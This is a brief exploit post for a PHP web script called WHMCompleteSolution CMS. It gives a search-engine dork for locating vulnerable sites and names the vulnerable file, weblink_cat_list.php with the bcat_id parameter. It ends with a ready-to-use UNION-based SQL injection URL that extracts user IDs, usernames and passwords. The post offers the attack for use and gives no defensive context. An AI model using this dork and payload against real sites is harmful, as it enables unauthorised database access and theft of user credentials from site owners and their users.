Dork :inurl:"weblink_cat_list.php?bcat_id= Manual Sqli

1.  
2. [+] script : WHMCompleteSolution CMS
3. [+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
4. [+] Vulnerability : php SQL injection
5. [+] Dork :inurl:"weblink_cat_list.php?bcat_id="
6. **************************************************************************/
7. [ Vulnerable File ]
8. http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
9. [ Exploit ]
10. http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4